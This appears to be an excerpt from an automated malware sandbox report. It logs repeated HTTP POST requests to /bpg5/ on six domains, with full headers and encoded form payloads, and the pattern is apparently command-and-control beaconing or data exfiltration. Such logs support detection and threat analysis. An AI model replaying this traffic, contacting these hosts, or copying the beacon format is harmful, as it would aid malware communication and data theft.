          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 45 47 6a 63 44 66 41 65 41 6e 32 52 4b 36 44 75 2d 33 79 74 7a 44 7a 32 52 33 65 78 68 38 72 33 6f 48 70 31 77 77 42 7e 72 53 61 4e 74 68 61 7e 46 49 31 70 55 7a 43 56 76 72 31 79 45 79 7a 68 70 56 69 63 45 4d 49 63 6c 53 72 7e 4c 28 33 65 77 32 51 50 6d 56 37 32 55 42 39 7e 36 33 6f 51 78 7a 78 41 52 68 52 50 4c 72 4e 64 31 6b 59 39 38 41 49 45 63 55 33 7a 39 6a 6f 67 6e 67 54 56 65 4c 47 28 6a 67 30 38 6b 68 30 47 44 45 36 55 79 53 72 38 6e 6b 32 30 58 28 66 34 51 6f 6a 43 6b 31 6a 4d 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: lpw7=jKc5GkmqQWJekEGjcDfAeAn2RK6Du-3ytzDz2R3exh8r3oHp1wwB~rSaNtha~FI1pUzCVvr1yEyzhpVicEMIclSr~L(3ew2QPmV72UB9~63oQxzxARhRPLrNd1kY98AIEcU3z9jogngTVeLG(jg08kh0GDE6UySr8nk20X(f4QojCk1jMg).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.gomarketing.infoConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.gomarketing.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gomarketing.info/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 44 79 6f 41 79 78 62 48 57 46 78 78 41 5a 4e 31 53 50 70 76 38 6e 57 4b 56 48 75 41 70 4b 6b 74 44 45 57 2d 59 55 34 5f 4a 61 68 66 4d 68 78 48 7a 43 30 46 4f 59 4e 65 6f 6a 64 54 6b 63 55 66 52 31 4e 77 76 5f 49 77 61 59 73 32 6f 51 54 2d 4b 6b 32 62 63 63 4a 30 4b 53 67 73 76 6a 45 74 77 6f 35 6e 4d 4d 7a 64 6f 41 6d 51 54 4d 48 36 37 66 57 55 78 41 50 59 53 5f 51 6e 70 59 47 65 38 54 48 47 74 63 58 45 54 61 41 62 7a 59 33 2d 6a 62 57 46 46 6a 6c 64 68 46 36 42 33 6b 45 71 78 45 4e 51 4e 67 52 76 35 6a 46 79 42 4d 33 6d 70 4c 4b 61 69 50 52 41 69 32 6d 2d 31 63 64 39 76 74 78 72 6f 77 56 67 75 42 61 4c 5a 59 52 6c 4d 78 64 45 37 74 34 35 42 57 43 5f 38 57 44 31 7a 68 38 54 6a 34 7e 39 47 64 49 79 41 6d 6a 4f 35 41 68 67 74 69 42 39 59 55 57 71 55 41 42 4b 34 70 35 4b 30 66 55 37 73 46 41 78 31 64 79 46 45 52 52 54 52 78 67 6f 6c 6d 4c 2d 6f 67 7a 39 71 77 67 7a 4a 66 47 62 4f 51 5a 52 57 69 31 61 69 30 44 66 45 6a 79 6a 54 52 61 78 52 43 73 5a 71 63 4a 72 28 62 39 4c 65 59 64 77 73 67 4a 4f 30 77 4d 4c 79 78 4d 35 79 75 43 34 59 6f 73 58 75 50 43 48 7a 51 4b 30 6b 4f 4f 43 4f 7a 4f 74 62 41 54 6e 41 51 56 47 59 70 45 66 59 6f 75 73 4c 35 6b 6b 51 41 35 55 39 67 67 6b 75 30 53 42 53 6f 6a 68 55 67 6c 73 66 69 6e 72 34 56 6c 63 6a 44 55 34 30 59 46 47 30 69 37 71 53 39 65 41 33 71 51 7a 76 31 58 75 57 63 6f 67 65 4d 62 4b 33 69 65 76 78 38 37 56 33 76 41 48 5a 4d 67 57 58 56 6c 56 47 71 32 6b 78 56 28 77 49 39 55 36 51 76 6a 59 48 6f 37 34 39 73 59 49 4f 59 36 77 59 5a 56 64 76 79 63 4f 71 41 6f 78 63 4f 72 55 30 6c 45 65 34 72 6e 42 58 79 52 64 42 68 77 79 5a 74 6c 4f 70 79 50 5f 7e 6f 41 43 41 74 61 2d 79 48 4d 52 7a 36 69 55 79 53 49 58 41 44 52 44 44 78 45 35 74 45 45 5f 74 41 77 51 72 41 47 4e 59 52 62 4c 55 5a 31 39 7e 5f 6c 6a 4e 47 74 30 56 73 55 57 6a 68 67 31 49 5a 4f 77 52 54 73 31 43 62 4f 49 50 79 64 34 4f 4b 39 52 55 37 79 4e 73 4a 6f 43 52 43 68 48 34 75 28 48 79 7a 36 4a 39 56 43 30 57 70 33 76 59 43 62 39 4b 31 48 53 4e 79 4d 46 4a 66 77 44 72 67 4a 69 59 57 38 46 64 77 30 78 6b 37 5a 35 6e 48 6c 73 58 5a 79 70 59 78 67 58 28 70 61 78 52 4c 6d 57 6f 30 61 59 6f 62 34 30 63 33 7e 31 78 68 39 75 6e 5a 4e 37 36 4e 66 6a 4b 59 75 44 6e 49 67 63 30 79 7e 53 35 49 69 7a 6b 51 7a 32 35 4c 44 38 38 67 44 71 63 34 48 48 32 62 5a 63 37 74 53 79 48 68 28 76 57 4a 4a 44 71 54 30 44 46 6d 52 6b 33 6d 49 32 4c 32 4a 62 77 4c 4a 34 30 6d 63 50 72 57 68 48 75 47 67 70 31 47 78 49 68 6c 71 65 51 56 6c 6e 50 2d 30 36 37 50 5a 63 4d 66 33 62 7a 31 4b 41 56 68 62 72 63 61 57 6e 36 6d 37 36 50 31 36 38 6f 43 48 59 72 64 43 75 77 4
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.gomarketing.infoConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.gomarketing.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gomarketing.info/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 44 79 6f 41 79 78 62 48 57 46 78 78 41 61 4a 31 54 65 70 76 28 48 57 4b 57 48 75 41 6e 71 6b 76 44 45 4b 59 59 57 55 76 4a 70 52 66 4d 51 42 48 7a 77 63 46 4e 59 4e 52 77 54 64 58 67 63 55 77 52 31 4d 5a 76 36 49 77 61 5a 4d 32 72 32 58 2d 66 31 32 59 55 4d 4a 79 66 43 67 58 76 6a 5a 5a 77 6f 31 33 4d 50 7a 64 6f 47 6d 51 53 4d 58 36 78 64 4f 55 68 41 50 57 47 50 51 4b 70 59 4b 4c 38 54 58 4f 74 63 44 45 53 72 73 62 7a 4e 4c 2d 31 59 7e 46 50 44 6c 6d 31 56 37 52 6e 58 77 68 6e 57 59 35 4a 41 5a 47 38 56 6c 74 4c 4f 75 34 70 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: lpw7=DyoAyxbHWFxxAaJ1Tepv(HWKWHuAnqkvDEKYYWUvJpRfMQBHzwcFNYNRwTdXgcUwR1MZv6IwaZM2r2X-f12YUMJyfCgXvjZZwo13MPzdoGmQSMX6xdOUhAPWGPQKpYKL8TXOtcDESrsbzNL-1Y~FPDlm1V7RnXwhnWY5JAZG8VltLOu4pA).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.antalyabfe.comConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.antalyabfe.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.antalyabfe.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 38 47 70 58 4f 52 53 76 43 6e 31 5f 6b 56 78 65 79 75 6c 56 4b 50 56 4d 64 50 50 62 7e 6a 7a 5a 44 70 4b 77 52 6c 61 4b 76 43 57 37 69 6e 45 4c 50 5f 48 2d 6a 72 5a 56 38 7a 76 73 57 5f 4a 77 73 75 65 4a 7a 34 6f 4e 4f 49 28 4a 74 30 52 2d 4b 4a 45 7a 47 41 4d 54 57 64 57 48 53 73 54 79 34 70 6e 4d 63 44 53 35 5a 6f 49 69 65 55 7a 36 4e 6f 49 56 31 6e 4b 38 58 31 79 41 65 66 63 72 50 35 67 4c 7e 34 42 6f 41 4c 4a 6b 42 6b 4a 41 7a 4c 32 67 50 49 71 7a 76 54 4b 4d 73 72 48 33 41 69 69 79 37 43 6e 66 33 56 52 6d 38 57 7a 69 28 33 6d 6f 4a 37 41 4a 58 64 70 6d 4e 41 7e 7a 38 31 35 49 53 30 67 58 52 4d 54 55 59 33 4b 37 51 55 39 70 46 44 4d 6f 38 7a 66 52 30 7a 61 43 68 6d 4c 55 36 73 31 4b 6a 35 62 37 46 54 64 69 69 4a 47 4b 6d 59 75 68 6e 37 73 76 31 38 68 64 78 38 6d 77 7a 33 39 49 77 49 52 65 35 69 38 58 67 62 49 42 54 75 6e 2d 4d 38 6a 37 58 39 74 79 70 38 57 46 33 62 71 68 63 76 4c 4f 6d 69 6d 4a 42 61 64 31 43 58 79 6a 79 49 78 44 39 44 45 4d 28 2d 64 67 58 2d 4d 37 53 66 69 54 67 50 4e 6d 6b 50 43 56 4b 37 42 71 4a 5a 37 76 76 31 6d 42 64 75 51 35 59 59 74 39 6a 71 69 71 44 54 53 63 64 48 73 57 4f 58 65 78 42 34 37 4f 65 65 33 52 61 4b 76 59 55 51 62 5a 4c 4b 37 46 67 38 44 4d 39 7a 55 73 6d 32 4b 76 59 51 4c 4c 77 69 75 6c 62 37 68 56 41 4b 62 59 74 4a 55 34 68 69 48 7a 48 51 65 42 4e 4a 46 66 6a 48 74 4d 77 59 74 45 79 6c 6f 62 65 4a 71 49 6f 71 66 75 4f 44 43 4d 7a 38 53 50 74 34 36 31 47 79 6c 59 7a 79 66 67 56 56 67 74 4a 73 46 50 33 6c 67 37 46 54 42 53 71 72 63 37 4d 51 45 37 66 77 55 7a 64 31 44 72 6b 6f 6a 4a 54 46 65 33 4d 50 34 6b 7e 38 51 59 4d 38 32 39 73 76 71 59 4a 37 5a 74 4b 66 77 6b 6b 31 71 6b 42 48 4e 71 4c 39 68 42 50 6c 79 70 79 5a 6c 31 39 5f 59 62 6e 64 48 61 70 51 4f 59 33 38 72 77 31 75 28 70 79 49 66 66 31 64 62 6b 6a 4a 6f 48 69 79 63 32 73 35 49 71 33 56 61 37 4e 48 6a 75 75 31 59 78 61 73 49 36 4e 50 51 53 52 62 49 48 76 65 30 79 6d 74 73 6c 4b 62 28 52 6d 33 30 6d 37 45 4f 62 36 4e 33 43 51 51 44 44 64 79 35 63 41 35 78 55 70 31 6d 66 4b 6d 70 34 28 6c 7a 61 58 4d 77 58 77 7a 34 45 57 55 56 41 73 55 63 44 78 33 41 47 45 4e 39 44 42 5f 4c 30 32 4b 7a 74 36 48 44 62 4e 57 5a 62 4c 32 32 51 54 77 48 38 7e 39 36 70 78 62 72 61 46 38 7a 76 70 5a 30 41 37 47 65 61 45 76 61 4e 58 59 49 53 4c 77 58 43 56 45 4b 48 48 64 64 39 31 66 79 71 51 63 65 51 72 6d 78 35 51 42 77 75 6c 54 4d 70 44 6f 57 52 38 62 7a 5a 35 73 74 34 45 59 71 38 61 66 68 57 5a 54 55 73 44 68 63 64 33 30 61 76 35 66 58 70 69 67 76 58 6d 53 39 44 4d 4d 63 46 32 56 4d 2d 61 54 4d 63 36 67 7a 6d 6e 69 6d 49 51 34 66 4c 56 65 71 79 70 61 71 7
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.antalyabfe.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.antalyabfe.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.antalyabfe.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 38 47 70 58 4f 52 53 76 43 6e 31 5f 6b 55 78 65 79 5f 6c 56 4d 76 56 4d 65 50 50 62 72 54 7a 62 44 70 48 4e 52 6b 76 52 76 30 79 37 68 79 6f 4c 50 4d 76 2d 6b 72 5a 55 30 54 76 6f 59 66 4a 68 73 75 66 71 7a 36 38 4e 4f 49 37 4a 72 53 64 2d 66 59 45 77 4f 51 4d 56 64 39 57 45 53 74 75 4d 34 70 6a 6d 63 44 36 35 5a 75 49 69 66 55 44 36 47 72 77 56 67 48 4b 36 52 31 79 74 65 66 51 36 50 34 4d 39 7e 34 56 6f 41 36 56 6b 42 31 70 41 32 63 61 67 47 6f 71 79 37 6a 4c 2d 6f 5a 72 37 45 42 62 44 79 6a 37 41 70 78 45 48 71 6c 69 71 6c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: lpw7=8GpXORSvCn1_kUxey_lVMvVMePPbrTzbDpHNRkvRv0y7hyoLPMv-krZU0TvoYfJhsufqz68NOI7JrSd-fYEwOQMVd9WEStuM4pjmcD65ZuIifUD6GrwVgHK6R1ytefQ6P4M9~4VoA6VkB1pA2cagGoqy7jL-oZr7EBbDyj7ApxEHqliqlw).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.rt66omm.comConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.rt66omm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rt66omm.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 62 6e 6a 75 75 75 38 66 33 6b 52 66 64 49 46 38 54 48 30 74 43 62 68 34 68 71 56 58 7a 77 55 7a 37 6d 33 66 4a 45 7e 70 48 4e 41 69 73 47 46 72 4a 42 31 53 72 64 78 39 68 31 6a 6b 59 4b 28 38 54 4e 50 6a 28 6e 35 57 33 6a 55 4c 34 58 68 4f 6d 36 64 33 47 50 57 2d 71 58 34 43 76 45 4c 42 64 73 74 65 4a 4c 4c 69 31 70 4b 43 31 47 4c 2d 6c 37 76 70 75 6d 4e 4e 48 56 74 53 76 6f 6e 4a 34 43 4e 4b 69 72 51 5f 51 58 57 51 49 63 64 62 61 67 44 6c 49 72 64 41 6d 33 5a 63 37 65 43 4e 6c 2d 62 43 33 55 4f 37 6c 43 4e 52 36 6d 43 6a 35 43 53 36 6d 50 71 72 37 59 4f 6f 6c 67 4b 48 54 58 6a 62 63 34 49 50 61 2d 69 4b 74 4e 69 5f 47 48 4b 6e 52 59 70 4d 4e 43 51 5f 38 71 50 31 4e 55 4f 53 50 51 73 43 4b 43 6a 6e 4e 50 35 51 68 55 53 65 46 56 30 74 52 47 45 34 55 46 76 61 4a 6d 72 47 61 31 61 65 77 68 75 69 56 65 61 6f 64 50 32 44 33 51 32 7a 31 45 47 6c 61 74 4a 66 7e 33 4d 38 47 62 43 44 51 6c 4d 4d 46 38 53 77 76 39 5a 7a 6f 56 42 61 5a 61 45 4d 35 34 65 30 44 57 67 55 56 5f 6c 64 6e 75 57 34 44 50 30 4d 54 70 48 72 49 69 51 53 65 49 61 49 36 43 33 49 41 79 4a 71 36 65 28 5a 31 65 63 71 4e 46 31 58 41 6c 36 2d 57 79 41 5f 45 49 53 36 36 35 71 53 50 33 48 57 4c 66 64 63 51 55 45 53 7a 73 52 76 50 51 43 70 33 56 42 6a 39 46 28 49 4b 4b 54 68 66 39 75 4a 79 6e 4e 47 57 72 36 58 50 50 45 32 76 78 5a 56 7e 47 42 66 63 34 42 37 28 67 41 61 37 51 63 5a 74 70 30 5a 4a 7a 72 6f 55 34 71 4d 36 62 56 52 31 35 36 50 4e 46 41 4a 74 77 44 75 69 4e 31 4f 32 39 72 74 61 71 36 63 41 36 34 70 57 76 6e 4e 64 37 38 56 52 76 51 30 4a 77 35 46 46 48 51 43 47 67 37 69 66 45 52 41 4f 72 6b 65 6c 68 75 4d 37 2d 43 41 65 30 35 63 4a 63 7e 2d 38 68 66 4c 54 54 6b 32 66 72 65 74 54 64 39 45 45 54 43 32 6b 45 45 37 37 45 67 77 41 65 70 77 64 72 65 4a 49 39 6e 4a 50 6d 43 7a 32 65 74 45 63 37 49 45 63 62 30 6f 6d 49 63 51 52 4d 48 64 30 4e 6d 79 65 61 51 6f 77 69 47 42 48 56 6d 4f 34 5a 59 51 64 79 39 71 58 34 65 30 6a 4e 50 73 34 72 42 52 35 36 6f 54 32 73 44 78 70 2d 42 33 67 76 39 4e 65 39 66 34 36 66 37 4f 62 61 76 43 44 51 76 49 62 76 58 49 38 73 45 2d 53 45 36 50 34 43 6b 39 74 6a 58 74 6b 4a 30 48 6b 65 53 70 58 55 6b 75 6c 38 6e 4d 79 62 72 75 59 4f 69 53 7e 72 59 52 4d 45 50 4f 65 57 45 6a 54 30 6b 54 36 56 30 5a 43 74 34 41 4d 74 78 71 58 4f 6e 38 59 7a 6a 53 54 58 56 79 44 77 44 65 39 38 6b 6d 49 61 32 5f 76 59 4b 52 4f 61 7a 6c 6b 63 51 30 69 6a 66 51 44 72 42 59 67 75 69 46 7a 61 41 4f 48 2d 75 6d 33 61 74 5a 74 34 33 31 4f 69 30 56 4f 76 37 39 34 63 4f 78 69 48 71 4d 66 32 55 42 52 6f 44 56 44 6f 6e 52 5a 32 36 74 54 42 67 6c 76 50 76 70 4c 33 50 72 4c 64 6f 33 6f 56 6
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.rt66omm.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.rt66omm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rt66omm.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 62 6e 6a 75 75 75 38 66 33 6b 52 66 64 50 35 38 42 6d 30 74 43 37 68 34 74 4b 56 58 35 51 55 31 37 6d 37 68 4a 46 36 66 48 2d 51 69 76 58 31 72 4a 54 4e 53 73 64 78 36 70 56 6a 67 48 61 28 74 54 4e 4f 43 28 6c 74 57 33 6a 51 4c 35 31 4a 4f 67 37 64 30 45 5f 57 38 6d 33 34 50 76 45 48 49 64 73 68 4f 4a 4c 6a 69 31 73 43 43 30 46 6a 2d 6a 65 62 70 37 47 4e 78 4d 31 73 51 76 6f 71 54 34 43 39 34 69 6f 45 5f 51 47 61 51 4a 4a 68 62 65 33 33 6c 42 4c 64 4e 72 58 5a 4b 77 63 4c 44 78 39 7e 59 38 45 7e 4f 73 58 70 41 30 6c 48 30 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: lpw7=bnjuuu8f3kRfdP58Bm0tC7h4tKVX5QU17m7hJF6fH-QivX1rJTNSsdx6pVjgHa(tTNOC(ltW3jQL51JOg7d0E_W8m34PvEHIdshOJLji1sCC0Fj-jebp7GNxM1sQvoqT4C94ioE_QGaQJJhbe33lBLdNrXZKwcLDx9~Y8E~OsXpA0lH06Q).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.haynicorpon.bizConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.haynicorpon.bizUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.haynicorpon.biz/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 4a 33 4e 6b 78 76 66 41 6d 32 54 4c 34 33 7e 30 73 38 58 67 52 44 6a 58 54 33 52 75 47 6b 67 66 32 30 49 50 78 77 33 65 7e 68 4e 5f 44 63 4e 4c 65 35 50 4f 36 4e 72 36 43 5a 33 33 71 66 31 38 4c 34 4e 75 49 42 50 43 36 2d 35 34 28 4b 49 6f 65 61 76 49 44 5a 4a 58 47 77 6b 31 39 36 57 43 32 55 58 68 45 41 54 6d 68 75 71 39 6f 4b 4a 74 77 68 5a 2d 59 71 6d 37 6d 58 59 37 71 75 49 54 73 6e 30 47 58 75 34 39 36 4c 45 50 34 59 4a 34 59 79 4c 4d 6f 64 78 36 6f 71 53 6e 38 50 56 36 75 65 71 64 70 68 33 6e 50 63 48 45 41 55 57 37 4a 39 45 6c 63 35 72 4a 70 78 55 52 74 73 52 4c 35 59 67 67 55 73 39 4c 66 33 59 36 45 61 36 77 6e 36 6a 6c 71 30 39 49 58 36 33 34 66 63 48 39 64 43 4f 47 72 34 52 77 6a 45 4d 31 36 58 63 38 53 61 57 43 67 64 53 4a 70 6e 38 37 55 4e 65 72 36 71 51 57 63 4f 53 51 54 67 36 76 6d 57 79 61 39 6c 5a 77 39 55 75 76 36 53 53 4d 56 57 41 6f 51 4d 63 47 50 48 28 2d 6b 63 33 6e 76 62 52 79 57 35 44 6d 75 49 49 31 36 58 46 4d 78 6d 55 63 47 74 50 4a 55 6b 6c 57 43 4f 73 4c 45 4a 28 7a 75 5a 6a 52 6b 49 6c 44 71 36 64 35 32 67 34 65 59 2d 38 71 39 32 5a 72 55 46 46 38 65 6d 62 4d 47 56 52 33 48 41 71 75 52 47 59 43 49 49 37 4f 44 61 44 5f 47 58 56 67 30 4e 6c 53 63 38 50 73 38 2d 65 30 4c 4d 65 56 47 32 46 4c 6e 32 47 55 72 31 56 36 4d 61 28 66 6f 52 6e 79 6d 77 66 43 63 73 4c 2d 39 59 7a 6c 37 76 75 47 6b 61 44 72 4b 73 4d 52 55 42 57 76 30 43 4a 33 38 49 55 77 45 35 66 4d 71 78 78 4a 72 4d 74 39 50 72 43 59 4a 73 64 31 73 75 68 32 4e 78 7e 54 73 6a 4d 58 5a 71 41 4c 32 38 32 76 39 36 56 6f 39 58 66 75 36 79 39 75 39 4c 76 46 37 57 5a 7a 6f 33 55 77 57 78 37 61 7a 34 73 75 6f 4e 52 4e 71 73 72 50 4d 66 7a 31 44 51 6d 31 6b 6f 58 36 78 48 7e 44 53 41 44 48 66 44 32 68 47 33 38 2d 52 4a 4d 41 61 45 6e 2d 7e 54 59 62 46 71 57 56 4b 6c 4f 4d 76 73 62 6e 78 66 76 37 73 69 6f 76 39 68 58 6b 73 6b 58 66 66 44 59 42 6b 5f 44 57 44 33 37 2d 34 54 6f 44 56 77 38 74 70 64 70 32 47 59 4e 79 35 6e 69 4d 49 44 55 58 72 5f 48 49 30 5a 64 6b 55 41 53 56 59 33 32 6d 53 32 46 7a 6d 74 56 54 39 57 61 76 4d 33 65 4d 4b 4f 58 6b 4a 35 6f 4b 54 59 74 52 6c 76 28 62 61 56 4c 4c 62 62 6d 69 63 57 36 6f 31 76 36 4e 62 45 33 38 38 62 34 71 68 6d 4d 39 66 62 6a 70 66 50 28 66 7e 33 6d 6f 61 4a 49 4b 54 66 54 4b 45 45 7e 58 61 2d 59 55 59 70 68 4f 36 47 58 7a 36 5a 48 76 4a 47 4d 73 58 64 56 79 76 5a 67 2d 73 7a 53 42 48 6e 31 6d 45 54 6d 44 6f 33 63 35 79 50 44 64 79 53 57 2d 75 6e 74 43 6e 61 31 77 33 4c 37 33 51 31 28 77 6f 74 4b 6b 65 48 73 2d 65 65 65 56 55 46 36 75 58 5a 4d 46 6a 79 49 4f 34 43 39 6b 38 67 76 6d 77 45 56 43 79 76 4d 74 39 58 4
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.haynicorpon.bizConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.haynicorpon.bizUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.haynicorpon.biz/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 4a 33 4e 6b 78 76 66 41 6d 32 54 4c 34 30 57 30 74 74 58 67 54 6a 6a 58 55 33 52 75 4a 45 67 56 32 30 45 48 78 78 44 4f 7e 57 52 5f 44 4e 39 4c 4c 62 6e 4f 35 4e 72 39 4e 35 32 2d 6b 5f 31 54 4c 34 4e 36 49 44 62 43 36 36 70 34 35 6f 77 6f 59 65 62 50 63 35 4a 43 4e 51 6b 34 39 36 61 68 32 55 4c 71 45 41 37 6d 68 73 7e 39 72 4b 5a 74 32 45 74 2d 4a 4b 6d 48 78 48 59 67 71 75 30 43 73 6e 45 34 58 71 41 39 36 36 49 50 34 6f 70 34 66 6a 4c 4d 39 4e 78 37 77 36 54 79 33 64 45 43 6a 72 37 38 75 69 44 71 4d 70 37 4b 42 31 76 52 4b 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: lpw7=J3NkxvfAm2TL40W0ttXgTjjXU3RuJEgV20EHxxDO~WR_DN9LLbnO5Nr9N52-k_1TL4N6IDbC66p45owoYebPc5JCNQk496ah2ULqEA7mhs~9rKZt2Et-JKmHxHYgqu0CsnE4XqA966IP4op4fjLM9Nx7w6Ty3dECjr78uiDqMp7KB1vRKw).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.vns96.netConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.vns96.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vns96.net/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 53 56 30 73 59 78 4f 65 4a 58 4f 5a 4b 4c 6f 52 6d 34 76 67 41 74 52 75 47 74 41 65 58 7a 47 70 47 65 63 64 39 56 4c 5f 69 4f 71 74 7a 48 39 36 38 45 77 57 6e 56 6e 36 5a 70 41 4b 63 50 53 31 34 30 66 34 34 71 67 63 50 4d 42 37 6d 30 64 78 4b 52 48 55 6a 78 33 69 64 43 77 75 36 5f 68 33 7e 41 44 5f 31 38 48 35 4e 36 5a 6c 75 52 53 76 72 2d 4d 4b 44 66 49 41 54 6a 75 49 74 6a 4e 43 44 2d 56 31 51 5a 61 43 58 4a 7e 78 71 67 54 6f 76 48 4f 71 61 66 79 61 43 44 28 74 44 72 6b 31 39 37 6f 44 6f 51 64 68 41 72 53 4c 68 6b 72 49 7e 30 74 2d 50 31 6d 35 5a 37 53 7a 7e 39 39 32 66 35 70 6a 67 75 64 73 63 48 6d 67 5a 6e 7e 57 42 6c 58 67 79 44 66 41 37 54 7e 43 7e 64 48 61 33 39 7e 4d 47 35 39 47 33 5f 58 64 59 69 74 49 6b 32 73 71 6c 4d 38 38 31 66 4d 56 4f 52 79 59 36 6b 30 6c 50 5a 59 75 6d 56 65 6e 30 77 35 30 6f 6c 54 6c 70 7a 64 55 4d 75 79 6b 52 43 34 4f 6f 48 72 53 31 72 4e 62 58 62 46 49 48 7a 62 6c 72 79 76 73 78 6f 63 68 37 73 37 6b 52 2d 35 50 71 65 74 6f 6d 62 4b 54 4a 6b 72 37 45 62 4e 74 36 69 49 50 49 71 4a 75 42 38 5a 30 35 49 51 74 57 61 32 41 58 56 39 52 6f 77 6a 2d 69 53 64 37 45 55 56 4b 7e 41 65 56 44 75 44 6b 72 32 6b 68 75 70 4c 6b 4e 74 70 65 57 49 31 45 38 35 4c 5f 7a 71 6a 52 6a 6a 68 67 61 74 67 2d 48 6c 78 30 70 41 33 68 38 56 31 78 6c 55 62 2d 6e 33 46 51 74 63 47 5a 4b 31 6e 67 71 4c 7a 36 38 62 67 63 6e 31 53 47 30 57 41 43 6c 70 31 6c 37 55 37 50 68 4d 77 6c 51 34 65 4e 6f 77 4f 2d 4c 32 28 39 49 51 74 61 51 39 7a 47 75 47 4c 79 43 77 47 4d 35 44 31 6c 63 54 44 30 4d 39 55 6d 5a 49 41 69 28 46 57 67 51 31 76 6e 6f 52 72 43 38 59 77 6e 6b 52 38 38 74 30 62 36 59 41 64 77 4c 5f 37 49 30 57 72 47 7e 65 52 50 49 57 49 43 79 45 62 78 68 34 74 2d 4a 57 7e 47 67 75 78 6c 51 6a 35 73 71 45 39 4b 69 35 64 76 50 2d 77 53 6d 4c 63 4e 73 4a 74 4c 43 6e 61 50 57 58 33 45 63 55 71 64 34 38 64 6d 4c 61 45 76 62 79 79 6c 54 39 4c 46 47 50 51 38 32 50 73 6a 46 5a 54 57 55 71 58 72 28 32 76 35 62 6a 78 56 74 51 65 4c 64 4d 68 4e 6d 76 37 51 6e 39 79 67 4f 53 4f 54 4e 4e 4f 4e 6a 41 7e 4b 71 55 58 48 32 64 6c 76 67 75 69 6b 53 48 6b 66 4a 70 5a 54 76 51 36 73 6a 31 43 42 63 2d 70 66 71 51 71 4b 61 52 4a 57 31 4e 43 74 54 42 74 61 47 51 28 36 6f 6e 75 31 61 61 57 6e 34 4a 4f 39 35 4e 69 58 50 73 6b 67 4d 63 71 58 6f 71 56 68 53 62 73 5a 46 4a 7a 64 4c 61 48 50 56 55 6f 32 77 69 66 43 54 49 55 70 68 37 4f 37 66 43 66 70 79 6a 51 6f 4f 42 76 30 4c 31 35 55 75 36 58 52 68 4f 6f 45 4a 38 31 78 46 37 57 53 70 6d 58 58 53 72 51 51 51 64 64 4b 68 62 51 41 71 36 5a 4e 67 2d 54 6f 74 7a 64 4e 42 61 4e 